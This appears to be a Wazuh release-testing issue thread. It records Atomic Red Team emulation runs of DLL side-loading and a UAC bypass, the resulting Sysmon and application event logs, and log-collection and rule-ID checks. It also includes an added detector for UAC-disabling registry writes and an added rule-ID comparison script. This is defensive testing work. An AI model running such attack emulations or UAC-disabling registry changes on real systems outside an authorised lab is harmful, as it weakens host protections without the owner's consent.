win.eventdata.ruleName: technique_id=T1548.002,technique_name=Bypass User Access Control
Dashboard event entry


T1574.002 – Hijack Execution Flow: DLL Side-Loading 🟢

GetPrereqs
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1574.002 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Attempting to satisfy prereq: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe)
Prereq already met: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe)
Test run
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1574.002
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Done executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Cleanup
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1574.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Done executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary
Event log
{"win":{"system":{"providerName":"Application Error","eventID":"1000","version":"0","level":"2","task":"100","opcode":"0","keywords":"0x80000000000000","systemTime":"2022-07-18T14:13:53.0245640Z","eventRecordID":"4206","processID":"0","threadID":"0","channel":"Application","computer":"EC2AMAZ-3188I1R","severityValue":"ERROR","message":"\"Faulting application name: GUP.exe, version: 5.1.1.0, time stamp: 0x5da631a5\r\nFaulting module name: GUP.exe, version: 5.1.1.0, time stamp: 0x5da631a5\r\nException code: 0xc0000409\r\nFault offset: 0x0000000000042de0\r\nFaulting process id: 0x196c\r\nFaulting application start time: 0x01d89ab09aae221f\r\nFaulting application path: C:\\AtomicRedTeam\\atomics\\T1574.002\\bin\\GUP.exe\r\nFaulting module path: C:\\AtomicRedTeam\\atomics\\T1574.002\\bin\\GUP.exe\r\nReport Id: 51d0d367-996f-43a3-9380-89ec88618fd6\r\nFaulting package full name: \r\nFaulting package-relative application ID: \""},"eventdata":{"data":"GUP.exe, 5.1.1.0, 5da631a5, GUP.exe, 5.1.1.0, 5da631a5, c0000409, 0000000000042de0, 196c, 01d89ab09aae221f, C:\\\\AtomicRedTeam\\\\atomics\\\\T1574.002\\\\bin\\\\GUP.exe, C:\\\\AtomicRedTeam\\\\atomics\\\\T1574.002\\\\bin\\\\GUP.exe, 51d0d367-996f-43a3-9380-89ec88618fd6"}}}
Dashboard event entry


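The Sysmon event 13 record quoted under T1548.002 above (the cleanup step writing EnableLUA back to 1) has the same shape the agent forwards when the test itself writes EnableLUA=0. The following is an added example, not code from this issue, Wazuh or Atomic Red Team, showing a small detector run over lines in that `win.*` JSON format: it accepts raw JSON or an archives.log line with the agent prefix, collapses the doubled backslashes the agent's encoding produces, and alerts when a UAC policy value under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` is set to 0. ConsentPromptBehaviorAdmin and PromptOnSecureDesktop are included as a generalisation beyond the EnableLUA write in the test; all sample lines except the first are constructed, and the first only reuses the field layout of the quoted event.

```python
import json
import re

# Registry key whose values govern UAC. EnableLUA is the value the T1548.002-8
# test flips with reg.exe; the other two are the standard prompt settings,
# added here as a generalisation of the same check.
POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUES = {
    "enablelua": "UAC disabled (EnableLUA=0)",
    "consentpromptbehavioradmin": "administrators elevate without a prompt",
    "promptonsecuredesktop": "elevation prompt moved off the secure desktop",
}
DWORD = re.compile(r"DWORD \(0x([0-9a-fA-F]+)\)")


def unescape(path):
    """Collapse runs of backslashes: the agent escapes them once more than the raw event."""
    return re.sub(r"\\+", lambda _m: "\\", path)


def parse_line(line):
    """Decode the win.* object from a raw JSON line or an archives.log line with a prefix."""
    start = line.find("{")
    if start < 0:
        return None
    try:
        return json.loads(line[start:]).get("win")
    except (json.JSONDecodeError, AttributeError):
        return None


def check_event(win):
    """Alert on a Sysmon event 13 (registry value set) that sets a UAC policy value to 0."""
    if not win:
        return None
    system, data = win.get("system", {}), win.get("eventdata", {})
    if system.get("providerName") != "Microsoft-Windows-Sysmon" or system.get("eventID") != "13":
        return None
    key, _, value_name = unescape(data.get("targetObject", "")).rpartition("\\")
    reason = UAC_VALUES.get(value_name.lower())
    if key.lower() != POLICY_KEY.lower() or reason is None:
        return None
    m = DWORD.search(data.get("details", ""))
    if m is None or int(m.group(1), 16) != 0:
        return None
    return {
        "computer": system.get("computer"),
        "time": system.get("systemTime"),
        "user": unescape(data.get("user", "")),
        "image": unescape(data.get("image", "")),
        "value": value_name,
        "reason": reason,
    }


def scan(lines):
    """Run check_event over every line and return the alerts in input order."""
    return [alert for alert in (check_event(parse_line(line)) for line in lines) if alert]


SAMPLE_LINES = [
    # Field layout of the event quoted in this issue: cleanup setting EnableLUA back to 1 (no alert).
    r'{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","eventID":"13","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","systemTime":"2022-07-18T15:49:05.1776583Z"},"eventdata":{"eventType":"SetValue","processId":"4724","image":"C:\\\\Windows\\\\system32\\\\reg.exe","targetObject":"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA","details":"DWORD (0x00000001)","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}',
    # Constructed: the same value set to 0, which is what the test itself does (alert).
    r'{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","eventID":"13","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","systemTime":"2022-07-18T15:48:30.0000000Z"},"eventdata":{"eventType":"SetValue","processId":"4700","image":"C:\\\\Windows\\\\system32\\\\reg.exe","targetObject":"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA","details":"DWORD (0x00000000)","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}',
    # Constructed: unrelated registry write by the same tool (no alert).
    r'{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","eventID":"13","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","systemTime":"2022-07-18T15:50:00.0000000Z"},"eventdata":{"eventType":"SetValue","processId":"4800","image":"C:\\\\Windows\\\\system32\\\\reg.exe","targetObject":"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Updater","details":"C:\\\\Tools\\\\updater.exe","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}',
    # Constructed: archives.log line with the agent prefix, admin prompt behaviour set to 0 (alert).
    r'2022 Jul 18 15:51:10 (EC2AMAZ-3188I1R) any->EventChannel {"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","eventID":"13","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","systemTime":"2022-07-18T15:51:09.0000000Z"},"eventdata":{"eventType":"SetValue","processId":"4900","image":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","targetObject":"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin","details":"DWORD (0x00000000)","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(alert)
```

Run as-is it reports two alerts (the constructed EnableLUA=0 write and the ConsentPromptBehaviorAdmin=0 write); piping `/var/ossec/logs/archives/archives.log` into `scan()` line by line works the same way because `parse_line` skips everything before the first brace and ignores lines that are not JSON.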
@roronoasins

roronoasins commented Jul 19, 2022

Test that Windows data collection works out of the box. 🟢

After enabling logall and sending some Windows Events, we can see the logs immediately:

eventcreate /l system /id 666 /d RC1 /t information /so wazuh
2022 Jul 19 09:15:52 (EC2AMAZ-3188I1R) any->EventChannel {"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-19T09:15:51.8604866Z","eventRecordID":"12679","processID":"2064","threadID":"2860","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Process Create:\r\nRuleName: technique_id=T1086,technique_name=PowerShell\r\nUtcTime: 2022-07-19 09:15:51.847\r\nProcessGuid: {a64f3178-7647-62d6-cb00-000000009100}\r\nProcessId: 4804\r\nImage: C:\\Windows\\System32\\eventcreate.exe\r\nFileVersion: 10.0.20348.1 (WinBuild.160101.0800)\r\nDescription: Event Create - Creates a custom event in an event log\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: evcreate.exe\r\nCommandLine: \"C:\\Windows\\system32\\eventcreate.exe\" /l system /id 666 /d RC1 /t information /so wazuh\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: EC2AMAZ-3188I1R\\Administrator\r\nLogonGuid: {a64f3178-736f-62d6-7b84-180000000000}\r\nLogonId: 0x18847B\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: SHA1=99E3376BD1C7AF02725BC5C27817E97B8EBA66B0,MD5=AFF33F653A19B5F5C6E53A579CF96925,SHA256=6A514444DFD92A291597844882FEA5463F130CE6D6CE9B0BBDCFF5E4D63A9BC6,IMPHASH=C2409212CE77AEE27A3AC6C3A1C2EC8C\r\nParentProcessGuid: {a64f3178-73b4-62d6-c500-000000009100}\r\nParentProcessId: 4796\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \r\nParentUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1086,technique_name=PowerShell","utcTime":"2022-07-19 
09:15:51.847","processGuid":"{a64f3178-7647-62d6-cb00-000000009100}","processId":"4804","image":"C:\\\\Windows\\\\System32\\\\eventcreate.exe","fileVersion":"10.0.20348.1 (WinBuild.160101.0800)","description":"Event Create - Creates a custom event in an event log","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"evcreate.exe","commandLine":"\\\"C:\\\\Windows\\\\system32\\\\eventcreate.exe\\\" /l system /id 666 /d RC1 /t information /so wazuh","currentDirectory":"C:\\\\Users\\\\Administrator\\\\","user":"EC2AMAZ-3188I1R\\\\Administrator","logonGuid":"{a64f3178-736f-62d6-7b84-180000000000}","logonId":"0x18847b","terminalSessionId":"2","integrityLevel":"High","hashes":"SHA1=99E3376BD1C7AF02725BC5C27817E97B8EBA66B0,MD5=AFF33F653A19B5F5C6E53A579CF96925,SHA256=6A514444DFD92A291597844882FEA5463F130CE6D6CE9B0BBDCFF5E4D63A9BC6,IMPHASH=C2409212CE77AEE27A3AC6C3A1C2EC8C","parentProcessGuid":"{a64f3178-73b4-62d6-c500-000000009100}","parentProcessId":"4796","parentImage":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","parentCommandLine":"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"","parentUser":"EC2AMAZ-3188I1R\\\\Administrator"}}}
eventcreate /l application /id 666 /d RC1 /t warning /so wazuh-app
2022 Jul 19 09:21:25 (EC2AMAZ-3188I1R) any->EventChannel {"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"1","version":"5","level":"4","task":"1","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-19T09:21:24.9668480Z","eventRecordID":"12715","processID":"2064","threadID":"2860","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Process Create:\r\nRuleName: technique_id=T1086,technique_name=PowerShell\r\nUtcTime: 2022-07-19 09:21:24.957\r\nProcessGuid: {a64f3178-7794-62d6-d300-000000009100}\r\nProcessId: 5096\r\nImage: C:\\Windows\\System32\\eventcreate.exe\r\nFileVersion: 10.0.20348.1 (WinBuild.160101.0800)\r\nDescription: Event Create - Creates a custom event in an event log\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: evcreate.exe\r\nCommandLine: \"C:\\Windows\\system32\\eventcreate.exe\" /l application /id 666 /d RC1 /t warning /so wazuh-app\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: EC2AMAZ-3188I1R\\Administrator\r\nLogonGuid: {a64f3178-736f-62d6-7b84-180000000000}\r\nLogonId: 0x18847B\r\nTerminalSessionId: 2\r\nIntegrityLevel: High\r\nHashes: SHA1=99E3376BD1C7AF02725BC5C27817E97B8EBA66B0,MD5=AFF33F653A19B5F5C6E53A579CF96925,SHA256=6A514444DFD92A291597844882FEA5463F130CE6D6CE9B0BBDCFF5E4D63A9BC6,IMPHASH=C2409212CE77AEE27A3AC6C3A1C2EC8C\r\nParentProcessGuid: {a64f3178-73b4-62d6-c500-000000009100}\r\nParentProcessId: 4796\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \r\nParentUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1086,technique_name=PowerShell","utcTime":"2022-07-19 09:21:24.957","processGuid":"{a64f3178-7794-62d6-d300-000000009100}","processId":"5096","image":"C:\\\\Windows\\\\System32\\\\eventcreate.exe","fileVersion":"10.0.20348.1 (WinBuild.160101.0800)","description":"Event Create - Creates a custom event in an event log","product":"Microsoft® Windows® Operating System","company":"Microsoft Corporation","originalFileName":"evcreate.exe","commandLine":"\\\"C:\\\\Windows\\\\system32\\\\eventcreate.exe\\\" /l application /id 666 /d RC1 /t warning /so wazuh-app","currentDirectory":"C:\\\\Users\\\\Administrator\\\\","user":"EC2AMAZ-3188I1R\\\\Administrator","logonGuid":"{a64f3178-736f-62d6-7b84-180000000000}","logonId":"0x18847b","terminalSessionId":"2","integrityLevel":"High","hashes":"SHA1=99E3376BD1C7AF02725BC5C27817E97B8EBA66B0,MD5=AFF33F653A19B5F5C6E53A579CF96925,SHA256=6A514444DFD92A291597844882FEA5463F130CE6D6CE9B0BBDCFF5E4D63A9BC6,IMPHASH=C2409212CE77AEE27A3AC6C3A1C2EC8C","parentProcessGuid":"{a64f3178-73b4-62d6-c500-000000009100}","parentProcessId":"4796","parentImage":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","parentCommandLine":"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"","parentUser":"EC2AMAZ-3188I1R\\\\Administrator"}}}

@roronoasins
Contributor Author

roronoasins commented Jul 19, 2022

Check that, for the same Windows events, the alert rule IDs are the same as in the previous version. 🟡

How this was checked

Using the same standard as the previous Windows events check, a custom script that generates events has been used.

  1. Generate custom events
python3 winevt_generator.py
  2. Get the rule IDs from the generated Windows events
/var/ossec/bin/wazuh-logtest < /tmp/windows_events  2>&1 >/dev/null |  grep -E "id: '[0-9]*'" > X-Y-Z_rules_ids.txt
  3. Compare with previous versions

    Comparing the IDs within the file, we verify that it is identical to the previous manual testing (4.3.0), so the issue that was opened (Critical severity Windows rules 60012 and 60015 never trigger if the event is classified by channel. wazuh#12977) is still an issue.
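An added example of the comparison step, not code from the issue or from Wazuh itself: it extracts rule IDs from wazuh-logtest output with the same `id: '...'` pattern the grep above uses, diffs two runs event by event so a drift between releases shows up at the exact event, and reports expected rule IDs (60012 and 60015 from wazuh#12977) that never fired. The two sample runs are constructed; the IDs in them are illustrative, not real Wazuh rules.

```python
import re

# Rule-id line printed by wazuh-logtest in the rules phase; this is the
# same pattern the grep in the procedure above captures.
RULE_ID_RE = re.compile(r"id: '(\d+)'")


def extract_rule_ids(logtest_output: str) -> list:
    """Return rule IDs in order of appearance, one per matched event.

    Works both on raw wazuh-logtest output and on a file already
    reduced to the grepped "id: '...'" lines.
    """
    return RULE_ID_RE.findall(logtest_output)


def compare_rule_ids(previous: list, current: list) -> dict:
    """Compare two rule-id sequences event by event.

    Events are fed to wazuh-logtest in a fixed order, so position i in
    both runs refers to the same generated event. Returns the positions
    whose rule ID changed plus the event counts, so a mismatch can be
    traced back to a concrete event instead of a bare file diff.
    """
    changed = [(i, p, c)
               for i, (p, c) in enumerate(zip(previous, current)) if p != c]
    return {
        "identical": not changed and len(previous) == len(current),
        "changed": changed,
        "count_previous": len(previous),
        "count_current": len(current),
    }


def never_triggered(ids: list, expected: list) -> list:
    """Expected rule IDs that do not appear anywhere in the run.

    Useful for rules known not to fire, e.g. 60012 and 60015 from
    wazuh#12977, so a regression check can also assert on a fix.
    """
    seen = set(ids)
    return [rid for rid in expected if rid not in seen]


# Constructed sample: grepped rule-id lines from two runs (illustrative IDs).
PREVIOUS_RUN = "\tid: '100001'\n\tid: '100002'\n\tid: '100003'\n"
CURRENT_RUN = "\tid: '100001'\n\tid: '100009'\n\tid: '100003'\n"

if __name__ == "__main__":
    prev, cur = extract_rule_ids(PREVIOUS_RUN), extract_rule_ids(CURRENT_RUN)
    print(compare_rule_ids(prev, cur))          # event 1 changed
    print(never_triggered(cur, ["60012", "60015"]))
```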
